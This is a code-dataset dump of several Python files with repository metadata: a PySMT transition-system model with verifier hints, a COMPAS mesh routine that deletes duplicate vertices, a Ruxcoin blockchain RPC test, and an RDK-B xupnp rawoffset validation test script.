from typing import FrozenSet, Tuple import pysmt.typing as types from pysmt.environment import Environment as PysmtEnv from pysmt.fnode import FNode from utils import symb_to_next from hint import Hint, Location def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode, FNode]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) symbols = frozenset([pc, x, y, z]) n_locs = 5 int_bound = n_locs pcs = [] x_pcs = [] ints = [mgr.Int(i) for i in range(int_bound)] for l in range(n_locs): n = ints[l] pcs.append(mgr.Equals(pc, n)) x_pcs.append(mgr.Equals(x_pc, n)) m_1 = mgr.Int(-1) pcend = mgr.Equals(pc, m_1) x_pcend = mgr.Equals(x_pc, m_1) # initial location. init = pcs[0] # control flow graph. cfg = mgr.And( # pc = -1 : -1, mgr.Implies(pcend, x_pcend), # pc = 0 & !(y >= 1) : -1, mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend), # pc = 0 & y >= 1 : 1, mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]), # pc = 1 & !(z >= 1) : -1, mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend), # pc = 1 & z >= 1 : 2, mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]), # pc = 2 & !(x >= 0) : -1, mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend), # pc = 2 & x >= 0 : 3, mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]), # pc = 3 : 4, mgr.Implies(pcs[3], x_pcs[4]), # pc = 4 : 2, mgr.Implies(pcs[4], x_pcs[2])) # transition labels. labels = mgr.And( # (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcend, x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[0], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[0], x_pcs[1]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[1], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[1], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[2], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[2], x_pcs[3]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z), mgr.Implies( mgr.And(pcs[3], x_pcs[4]), mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z), mgr.Implies( mgr.And(pcs[4], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])), mgr.Equals(x_z, z)))) # transition relation. trans = mgr.And(cfg, labels) # fairness. fairness = mgr.Not(pcend) return symbols, init, trans, fairness def hints(env: PysmtEnv) -> FrozenSet[Hint]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) symbs = frozenset([pc, x, y, z]) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) res = [] i_0 = mgr.Int(0) i_1 = mgr.Int(1) i_2 = mgr.Int(2) i_3 = mgr.Int(3) loc = Location(env, mgr.LE(z, i_0)) loc.set_progress(0, mgr.Equals(x_z, z)) h_z = Hint("h_z0", env, frozenset([z]), symbs) h_z.set_locs([loc]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_0)) loc0.set_progress(1, mgr.Equals(x_pc, i_1)) loc1 = Location(env, mgr.Equals(pc, i_1)) loc1.set_progress(2, mgr.Equals(x_pc, i_2)) loc2 = Location(env, mgr.Equals(pc, i_2)) loc2.set_progress(0, mgr.Equals(x_pc, i_3)) loc3 = Location(env, mgr.Equals(pc, i_3)) loc3.set_progress(0, mgr.Equals(x_pc, i_0)) h_pc = Hint("h_pc1", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2, loc3]) res.append(h_pc) stutter = mgr.Equals(x_x, x) loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1))) h_x = Hint("h_x2", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y))) h_x = Hint("h_x3", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0)) loc0.set_progress(1, mgr.Equals(x_z, y)) loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3)) loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x))) h_z = Hint("h_z3", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y))) loc2 = Location(env, mgr.GT(x, i_3)) loc2.set_progress(2, mgr.Equals(x_x, x)) h_x = Hint("h_x4", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1, loc2]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_0)) loc0.set_progress(1, mgr.Equals(x_z, z)) loc1 = Location(env, mgr.GE(z, i_0)) loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3))) h_z = Hint("h_z4", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_2)) loc0.set_progress(1, mgr.GT(x_pc, i_2)) loc1 = Location(env, mgr.GE(pc, i_3)) loc1.set_progress(2, mgr.GE(x_pc, i_3)) loc2 = Location(env, mgr.GE(pc, i_3)) loc2.set_progress(0, mgr.Equals(x_pc, i_2)) h_pc = Hint("h_pc4", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2]) res.append(h_pc) return frozenset(res)
34.981735
81
0.530087
from typing import FrozenSet, Tuple import pysmt.typing as types from pysmt.environment import Environment as PysmtEnv from pysmt.fnode import FNode from utils import symb_to_next from hint import Hint, Location def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode, FNode]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) symbols = frozenset([pc, x, y, z]) n_locs = 5 int_bound = n_locs pcs = [] x_pcs = [] ints = [mgr.Int(i) for i in range(int_bound)] for l in range(n_locs): n = ints[l] pcs.append(mgr.Equals(pc, n)) x_pcs.append(mgr.Equals(x_pc, n)) m_1 = mgr.Int(-1) pcend = mgr.Equals(pc, m_1) x_pcend = mgr.Equals(x_pc, m_1) init = pcs[0] cfg = mgr.And( mgr.Implies(pcend, x_pcend), mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend), mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]), mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend), mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]), mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend), mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]), mgr.Implies(pcs[3], x_pcs[4]), mgr.Implies(pcs[4], x_pcs[2])) labels = mgr.And( mgr.Implies( mgr.And(pcend, x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[0], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[0], x_pcs[1]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[1], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[1], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[2], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[2], x_pcs[3]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[3], x_pcs[4]), mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[4], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])), mgr.Equals(x_z, z)))) trans = mgr.And(cfg, labels) fairness = mgr.Not(pcend) return symbols, init, trans, fairness def hints(env: PysmtEnv) -> FrozenSet[Hint]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) symbs = frozenset([pc, x, y, z]) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) res = [] i_0 = mgr.Int(0) i_1 = mgr.Int(1) i_2 = mgr.Int(2) i_3 = mgr.Int(3) loc = Location(env, mgr.LE(z, i_0)) loc.set_progress(0, mgr.Equals(x_z, z)) h_z = Hint("h_z0", env, frozenset([z]), symbs) h_z.set_locs([loc]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_0)) loc0.set_progress(1, mgr.Equals(x_pc, i_1)) loc1 = Location(env, mgr.Equals(pc, i_1)) loc1.set_progress(2, mgr.Equals(x_pc, i_2)) loc2 = Location(env, mgr.Equals(pc, i_2)) loc2.set_progress(0, mgr.Equals(x_pc, i_3)) loc3 = Location(env, mgr.Equals(pc, i_3)) loc3.set_progress(0, mgr.Equals(x_pc, i_0)) h_pc = Hint("h_pc1", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2, loc3]) res.append(h_pc) stutter = mgr.Equals(x_x, x) loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1))) h_x = Hint("h_x2", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y))) h_x = Hint("h_x3", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0)) loc0.set_progress(1, mgr.Equals(x_z, y)) loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3)) loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x))) h_z = Hint("h_z3", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y))) loc2 = Location(env, mgr.GT(x, i_3)) loc2.set_progress(2, mgr.Equals(x_x, x)) h_x = Hint("h_x4", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1, loc2]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_0)) loc0.set_progress(1, mgr.Equals(x_z, z)) loc1 = Location(env, mgr.GE(z, i_0)) loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3))) h_z = Hint("h_z4", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_2)) loc0.set_progress(1, mgr.GT(x_pc, i_2)) loc1 = Location(env, mgr.GE(pc, i_3)) loc1.set_progress(2, mgr.GE(x_pc, i_3)) loc2 = Location(env, mgr.GE(pc, i_3)) loc2.set_progress(0, mgr.Equals(x_pc, i_2)) h_pc = Hint("h_pc4", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2]) res.append(h_pc) return frozenset(res)
true
true
f705dfb5b1b2d9fb7211529c9252df251ac0bfc7
2,270
py
Python
src/compas/datastructures/mesh/core/clean.py
XingxinHE/compas
d2901dbbacdaf4694e5adae78ba8f093f10532bf
[ "MIT" ]
235
2017-11-07T07:33:22.000Z
2022-03-25T16:20:00.000Z
src/compas/datastructures/mesh/core/clean.py
XingxinHE/compas
d2901dbbacdaf4694e5adae78ba8f093f10532bf
[ "MIT" ]
770
2017-09-22T13:42:06.000Z
2022-03-31T21:26:45.000Z
src/compas/datastructures/mesh/core/clean.py
XingxinHE/compas
d2901dbbacdaf4694e5adae78ba8f093f10532bf
[ "MIT" ]
99
2017-11-06T23:15:28.000Z
2022-03-25T16:05:36.000Z
from __future__ import print_function from __future__ import absolute_import from __future__ import division from compas.utilities import geometric_key __all__ = [ 'mesh_delete_duplicate_vertices' ] def mesh_delete_duplicate_vertices(mesh, precision=None): """Cull all duplicate vertices of a mesh and sanitize affected faces. Parameters ---------- mesh : Mesh A mesh object. precision : str (None) A formatting option that specifies the precision of the individual numbers in the string (truncation after the decimal point). Supported values are any float precision, or decimal integer (``'d'``). Default is ``'3f'``. Returns ------- None The mesh is modified in-place. Examples -------- >>> import compas >>> from compas.datastructures import Mesh >>> mesh = Mesh.from_obj(compas.get('faces.obj')) >>> mesh.number_of_vertices() 36 >>> for x, y, z in mesh.vertices_attributes('xyz', keys=list(mesh.vertices())[:5]): ... mesh.add_vertex(x=x, y=y, z=z) ... 36 37 38 39 40 >>> mesh.number_of_vertices() 41 >>> mesh_delete_duplicate_vertices(mesh) >>> mesh.number_of_vertices() 36 """ key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()} gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())} for key in list(mesh.vertices()): test = gkey_key[key_gkey[key]] if test != key: del mesh.vertex[key] del mesh.halfedge[key] for u in mesh.halfedge: nbrs = list(mesh.halfedge[u].keys()) for v in nbrs: if v == key: del mesh.halfedge[u][v] for fkey in mesh.faces(): seen = set() face = [] for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]: if key not in seen: seen.add(key) face.append(key) mesh.face[fkey] = face for u, v in mesh.face_halfedges(fkey): mesh.halfedge[u][v] = fkey if u not in mesh.halfedge[v]: mesh.halfedge[v][u] = None
28.734177
119
0.584141
from __future__ import print_function from __future__ import absolute_import from __future__ import division from compas.utilities import geometric_key __all__ = [ 'mesh_delete_duplicate_vertices' ] def mesh_delete_duplicate_vertices(mesh, precision=None): key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()} gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())} for key in list(mesh.vertices()): test = gkey_key[key_gkey[key]] if test != key: del mesh.vertex[key] del mesh.halfedge[key] for u in mesh.halfedge: nbrs = list(mesh.halfedge[u].keys()) for v in nbrs: if v == key: del mesh.halfedge[u][v] for fkey in mesh.faces(): seen = set() face = [] for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]: if key not in seen: seen.add(key) face.append(key) mesh.face[fkey] = face for u, v in mesh.face_halfedges(fkey): mesh.halfedge[u][v] = fkey if u not in mesh.halfedge[v]: mesh.halfedge[v][u] = None
true
true
f705dfc786bdc45229a3f652451375438bf1d183
2,856
py
Python
qa/rpc-tests/blockchain.py
dnoiz1/ruxcoin
07e30a2b5ebc624ac8a2d92be435e895ede5deae
[ "MIT" ]
null
null
null
qa/rpc-tests/blockchain.py
dnoiz1/ruxcoin
07e30a2b5ebc624ac8a2d92be435e895ede5deae
[ "MIT" ]
null
null
null
qa/rpc-tests/blockchain.py
dnoiz1/ruxcoin
07e30a2b5ebc624ac8a2d92be435e895ede5deae
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2014-2016 The Ruxcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Test RPC calls related to blockchain state. Tests correspond to code in # rpc/blockchain.cpp. # from decimal import Decimal from test_framework.test_framework import RuxcoinTestFramework from test_framework.authproxy import JSONRPCException from test_framework.util import ( assert_equal, assert_raises, assert_is_hex_string, assert_is_hash_string, start_nodes, connect_nodes_bi, ) class BlockchainTest(RuxcoinTestFramework): """ Test blockchain-related RPC calls: - gettxoutsetinfo - verifychain """ def __init__(self): super().__init__() self.setup_clean_chain = False self.num_nodes = 2 def setup_network(self, split=False): self.nodes = start_nodes(self.num_nodes, self.options.tmpdir) connect_nodes_bi(self.nodes, 0, 1) self.is_network_split = False self.sync_all() def run_test(self): self._test_gettxoutsetinfo() self._test_getblockheader() self.nodes[0].verifychain(4, 0) def _test_gettxoutsetinfo(self): node = self.nodes[0] res = node.gettxoutsetinfo() assert_equal(res['total_amount'], Decimal('8725.00000000')) assert_equal(res['transactions'], 200) assert_equal(res['height'], 200) assert_equal(res['txouts'], 200) assert_equal(res['bytes_serialized'], 13924), assert_equal(len(res['bestblock']), 64) assert_equal(len(res['hash_serialized']), 64) def _test_getblockheader(self): node = self.nodes[0] assert_raises( JSONRPCException, lambda: node.getblockheader('nonsense')) besthash = node.getbestblockhash() secondbesthash = node.getblockhash(199) header = node.getblockheader(besthash) assert_equal(header['hash'], besthash) assert_equal(header['height'], 200) assert_equal(header['confirmations'], 1) assert_equal(header['previousblockhash'], secondbesthash) assert_is_hex_string(header['chainwork']) assert_is_hash_string(header['hash']) assert_is_hash_string(header['previousblockhash']) assert_is_hash_string(header['merkleroot']) assert_is_hash_string(header['bits'], length=None) assert isinstance(header['time'], int) assert isinstance(header['mediantime'], int) assert isinstance(header['nonce'], int) assert isinstance(header['version'], int) assert isinstance(int(header['versionHex'], 16), int) assert isinstance(header['difficulty'], Decimal) if __name__ == '__main__': BlockchainTest().main()
31.733333
73
0.678221
from decimal import Decimal from test_framework.test_framework import RuxcoinTestFramework from test_framework.authproxy import JSONRPCException from test_framework.util import ( assert_equal, assert_raises, assert_is_hex_string, assert_is_hash_string, start_nodes, connect_nodes_bi, ) class BlockchainTest(RuxcoinTestFramework): def __init__(self): super().__init__() self.setup_clean_chain = False self.num_nodes = 2 def setup_network(self, split=False): self.nodes = start_nodes(self.num_nodes, self.options.tmpdir) connect_nodes_bi(self.nodes, 0, 1) self.is_network_split = False self.sync_all() def run_test(self): self._test_gettxoutsetinfo() self._test_getblockheader() self.nodes[0].verifychain(4, 0) def _test_gettxoutsetinfo(self): node = self.nodes[0] res = node.gettxoutsetinfo() assert_equal(res['total_amount'], Decimal('8725.00000000')) assert_equal(res['transactions'], 200) assert_equal(res['height'], 200) assert_equal(res['txouts'], 200) assert_equal(res['bytes_serialized'], 13924), assert_equal(len(res['bestblock']), 64) assert_equal(len(res['hash_serialized']), 64) def _test_getblockheader(self): node = self.nodes[0] assert_raises( JSONRPCException, lambda: node.getblockheader('nonsense')) besthash = node.getbestblockhash() secondbesthash = node.getblockhash(199) header = node.getblockheader(besthash) assert_equal(header['hash'], besthash) assert_equal(header['height'], 200) assert_equal(header['confirmations'], 1) assert_equal(header['previousblockhash'], secondbesthash) assert_is_hex_string(header['chainwork']) assert_is_hash_string(header['hash']) assert_is_hash_string(header['previousblockhash']) assert_is_hash_string(header['merkleroot']) assert_is_hash_string(header['bits'], length=None) assert isinstance(header['time'], int) assert isinstance(header['mediantime'], int) assert isinstance(header['nonce'], int) assert isinstance(header['version'], int) assert isinstance(int(header['versionHex'], 16), int) assert isinstance(header['difficulty'], Decimal) if __name__ == '__main__': BlockchainTest().main()
true
true
f705e0606ca251800b7dc62a1c80a689290a6c95
8,081
py
Python
testscripts/RDKB/component/XUPNP_B/TS_XUPNP_B_RawoffsetValidation.py
rdkcmf/rdkb-tools-tdkb
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
[ "Apache-2.0" ]
null
null
null
testscripts/RDKB/component/XUPNP_B/TS_XUPNP_B_RawoffsetValidation.py
rdkcmf/rdkb-tools-tdkb
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
[ "Apache-2.0" ]
null
null
null
testscripts/RDKB/component/XUPNP_B/TS_XUPNP_B_RawoffsetValidation.py
rdkcmf/rdkb-tools-tdkb
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
[ "Apache-2.0" ]
null
null
null
########################################################################## # If not stated otherwise in this file or this component's Licenses.txt # file the following copyright and licenses apply: # # Copyright 2019 RDK Management # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ########################################################################## ''' <?xml version="1.0" encoding="UTF-8"?><xml> <id/> <version>1</version> <name>TS_XUPNP_B_RawoffsetValidation</name> <primitive_test_id/> <primitive_test_name>XUPNPStub_CheckXDiscOutputFile</primitive_test_name> <primitive_test_version>1</primitive_test_version> <status>FREE</status> <synopsis>To get all the rawoffset parameters in the output.json file from DUT and validate them by comparing with rawoffset parameters in the output.json file from the clients connected.</synopsis> <groups_id/> <execution_time>10</execution_time> <long_duration>false</long_duration> <advanced_script>false</advanced_script> <remarks/> <skip>false</skip> <box_types> <box_type>Broadband</box_type> </box_types> <rdk_versions> <rdk_version>RDKB</rdk_version> </rdk_versions> <test_cases> <test_case_id>TC_XUPNP_13</test_case_id> <test_objective>To get all the rawoffset parameters in the output.json file from DUT and validate them by comparing with rawoffset parameters in the output.json file from the clients connected.</test_objective> <test_type>Positive</test_type> <test_setup>Broadband</test_setup> <pre_requisite>TDK Agent should be in running state for both DUT and clients connected or invoke it through StartTdk.sh script.</pre_requisite> <api_or_interface_used>None</api_or_interface_used> <input_parameters>None</input_parameters> <automation_approch>1. Load xupnp module. 2. Get the output.json file output from DUT and parse the output with bcastMacAddress:rawoffset mapping and store it. 3. Get the output.json file output from clients and parse the output with bcastMacAddress:rawoffset mapping and store it. 4. Compare the both the outputs. 5. If equal return SUCCESS, else FAILURE. 6.Unload xupnp module.</automation_approch> <expected_output>All rawoffset parameters retrieved from DUT and clients should be equal.</expected_output> <priority>High</priority> <test_stub_interface>xupnp</test_stub_interface> <test_script>TS_XUPNP_B_RawoffsetValidation</test_script> <skipped>No</skipped> <release_version>M70</release_version> <remarks/> </test_cases> </xml> ''' # use tdklib library,which provides a wrapper for tdk testcase script import tdklib; from xupnplib import *; #Test component to be tested obj = tdklib.TDKScriptingLibrary("xupnp","1"); #IP and Port of box, No need to change, #This will be replaced with correspoing Box Ip and port while executing script ip = <ipaddress> port = <port> obj.configureTestCase(ip,port,'TS_XUPNP_B_RawoffsetValidation'); #Get the result of connection with test component and STB loadmodulestatus=obj.getLoadModuleResult(); print "[LIB LOAD STATUS] : %s" %loadmodulestatus; if "SUCCESS" in loadmodulestatus.upper() : #Set the result status of execution obj.setLoadModuleStatus("SUCCESS"); tdkTestObj = obj.createTestStep("XUPNPStub_CheckXDiscOutputFile"); expectedresult = "SUCCESS"; tdkTestObj.executeTestCase(expectedresult); actualresult = tdkTestObj.getResult(); details = tdkTestObj.getResultDetails(); if expectedresult in actualresult : tdkTestObj.setResultStatus("SUCCESS"); logpath = details.split(" ")[0]; print "\n\n\n**************XUPNP DUT LOG TRANSFER - BEGIN*************\n\n" print "Transfering output log file : %s from DUT"%logpath; logpath = tdkTestObj.transferLogs(logpath, "false"); print "Local file path of Testrunner output log : %s" %logpath; info = open(logpath,'r'); output = info.read(); dictionary = LogParser(output,"rawoffset"); info.close() print "\n**************XUPNP DUT LOG TRANSFER - END*************\n\n" clientip_logfile_dic,NO_OF_CLIENTS = TransferLogsParser(obj); if len(dictionary) == NO_OF_CLIENTS + 1 : tdkTestObj.setResultStatus("SUCCESS"); print "All the connected clients data is populated in output.json file"; for key in clientip_logfile_dic : print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - BEGIN********\n\n"%key; print "Transfering output log file : %s from client with ip : %s"%(clientip_logfile_dic.get(key),key); filepath = tdkTestObj.transferLogs_from_box(key,clientip_logfile_dic.get(key), "false") print "Local file path of Testrunner output log : %s" %filepath; data = open(filepath,'r'); message = data.read() cli_dictionary = LogParser(message,"rawoffset"); print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - END********\n\n"%key; print "\n**************XUPNP OUTPUT - BEGIN*************\n\n" for key in dictionary : if dictionary.get(key) == cli_dictionary.get(key): tdkTestObj.setResultStatus("SUCCESS"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : SUCCESS"; print "\n********************************************************************************************\n"; else : tdkTestObj.setResultStatus("FAILURE"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : FAILURE"; print "\n********************************************************************************************\n"; data.close() print "\n**************XUPNP OUTPUT - END*************\n\n" else : tdkTestObj.setResultStatus("FAILURE"); print "All the connected clients data is NOT populated in output.json file"; else : tdkTestObj.setResultStatus("FAILURE"); print "Failed to get output.json file path from DUT"; print "DETAILS :",details; #Unload upnp module obj.unloadModule("xupnp"); else: print "Failed to load upnp module"; obj.setLoadModuleStatus("FAILURE"); print "Module loading failed";
54.972789
214
0.604999
